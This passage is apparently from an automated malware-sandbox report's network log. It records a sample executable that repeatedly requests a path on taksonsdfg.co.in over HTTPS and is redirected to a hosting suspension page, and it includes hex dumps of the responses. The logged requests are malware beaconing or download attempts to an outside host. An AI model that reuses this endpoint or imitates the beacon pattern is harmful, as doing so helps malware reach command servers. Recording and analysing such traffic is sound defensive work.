http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:13:32 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:13:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	49943	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:34 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:34 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:13:34 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:34 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	49949	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:36 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:36 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:13:36 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:36 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:13:36 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:13:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	49956	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:38 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:38 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:13:38 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:38 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	49962	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:40 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:40 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:13:40 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:40 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:13:40 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:13:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	49969	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:42 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:43 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:13:42 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:43 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	49975	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:44 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:45 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:13:44 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:45 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:13:45 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:13:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	49982	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:46 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:47 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:13:46 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:47 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.7	49987	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:48 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:49 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:13:48 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:49 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:13:49 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:13:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.7	49994	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:50 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:51 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:13:51 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:51 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.7	49998	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:52 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:53 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:13:53 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
